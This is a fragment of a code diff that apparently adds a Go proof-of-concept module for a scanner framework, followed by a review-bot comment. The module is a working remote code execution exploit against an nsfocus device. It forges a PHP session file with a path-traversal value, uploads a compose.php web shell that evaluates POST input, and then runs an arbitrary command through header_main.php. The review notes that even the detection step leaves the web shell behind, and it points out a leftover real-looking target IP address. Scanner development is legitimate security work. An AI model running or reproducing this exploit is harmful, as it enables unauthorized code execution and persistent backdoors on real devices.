     172 + cfg1 := httpclient.NewPostRequestConfig(uri1)
     173 + cfg1.VerifyTls = false
     174 + cfg1.FollowRedirect = false
     175 + cfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9")
     176 + cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9\r\nContent-Disposition: form-data; name=\"file\"; filename=\"sess_82c13f359d0dd8f51c29d658a9c8ac71\"\r\n\r\nlang|s:52:\"../../../../../../../../../../../../../../../../tmp/\";\r\n--1d52ba2a11ad8a915eddab1a0e85acd9--\r\n"
     177 + if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") {
     178 + time.Sleep(time.Second * 5)
     179 + uri2 := "/api/v1/device/bugsInfo"
     180 + cfg2 := httpclient.NewPostRequestConfig(uri2)
     181 + cfg2.VerifyTls = false
     182 + cfg2.FollowRedirect = false
     183 + cfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef")
     184 + cfg2.Data = "--4803b59d015026999b45993b1245f0ef\r\nContent-Disposition: form-data; name=\"file\"; filename=\"compose.php\"\r\n\r\n<?php eval($_POST[1]);?>\r\n--4803b59d015026999b45993b1245f0ef--\r\n"
     185 + if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") {
     186 + u3 := httpclient.NewFixUrl("https://" + u.IP + ":4433")
     187 + uri3 := "/mail/include/header_main.php"
     188 + cfg3 := httpclient.NewPostRequestConfig(uri3)
     189 + cfg3.VerifyTls = false
     190 + cfg3.FollowRedirect = false
     191 + cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71")
     192 + cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded")
     193 + cfg3.Data = "1=print+md5%281%29%3B"
     194 + if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil {
     195 + return resp3.StatusCode == 200 && strings.Contains(resp3.RawBody, "c4ca4238a0b923820dcc509a6f75849b")
     196 + }
     197 + 
     198 + }
     199 + }
     200 + 
     201 + return false
     202 + },
     203 + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
     204 + cmd := ss.Params["cmd"].(string)
     205 + 
     206 + u1 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":8081")
     207 + uri1 := "/api/v1/device/bugsInfo"
     208 + cfg1 := httpclient.NewPostRequestConfig(uri1)
     209 + cfg1.VerifyTls = false
     210 + cfg1.FollowRedirect = false
     211 + cfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9")
     212 + cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9\r\nContent-Disposition: form-data; name=\"file\"; filename=\"sess_82c13f359d0dd8f51c29d658a9c8ac71\"\r\n\r\nlang|s:52:\"../../../../../../../../../../../../../../../../tmp/\";\r\n--1d52ba2a11ad8a915eddab1a0e85acd9--\r\n"
     213 + if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") {
     214 + time.Sleep(time.Second * 5)
     215 + uri2 := "/api/v1/device/bugsInfo"
     216 + cfg2 := httpclient.NewPostRequestConfig(uri2)
     217 + cfg2.VerifyTls = false
     218 + cfg2.FollowRedirect = false
     219 + cfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef")
     220 + cfg2.Data = "--4803b59d015026999b45993b1245f0ef\r\nContent-Disposition: form-data; name=\"file\"; filename=\"compose.php\"\r\n\r\n<?php eval($_POST[1]);?>\r\n--4803b59d015026999b45993b1245f0ef--\r\n"
     221 + if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") {
     222 + u3 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":4433")
     223 + uri3 := "/mail/include/header_main.php"
     224 + cfg3 := httpclient.NewPostRequestConfig(uri3)
     225 + cfg3.VerifyTls = false
     226 + cfg3.FollowRedirect = false
     227 + cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71")
     228 + cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded")
     229 + cfg3.Data = fmt.Sprintf("1=%s", url.QueryEscape(cmd))
     230 + if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil && resp3.StatusCode == 200 {
     231 + expResult.Output = resp3.RawBody
     232 + expResult.Success = true
     233 + }
     234 + 
     235 + }
     236 + }
     237 + return expResult
     238 + },
     239 + ))
     240 +}
     241 + 
     242 +//https://222.75.146.134:4433
     243 + 
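Review bot: The detection callback (lines 168–202) uploads a persistent `compose.php` that evaluates `$_POST[1]` and never removes it, so merely scanning leaves an unauthenticated code-execution file on the device; `ExpTips` is empty and does not disclose this side effect, and the `ScanSteps` JSON (a GET to `/test.php` checking for `test` in the body) bears no relation to what the callback actually does, which will confuse anyone reading the POC definition alone. The two callbacks repeat the same upload sequence almost line for line, differing only in the host and the final body, which invites drift; factoring the shared part into a helper that returns the session-bound `u3` would be the usual fix. The `EN` translation's `Name` is still Chinese and should read `"Name": "nsfocus resourse.php arbitrary file upload vulnerability",`, and the trailing `//https://222.75.146.134:4433` comment looks like a leftover test host that should not be committed.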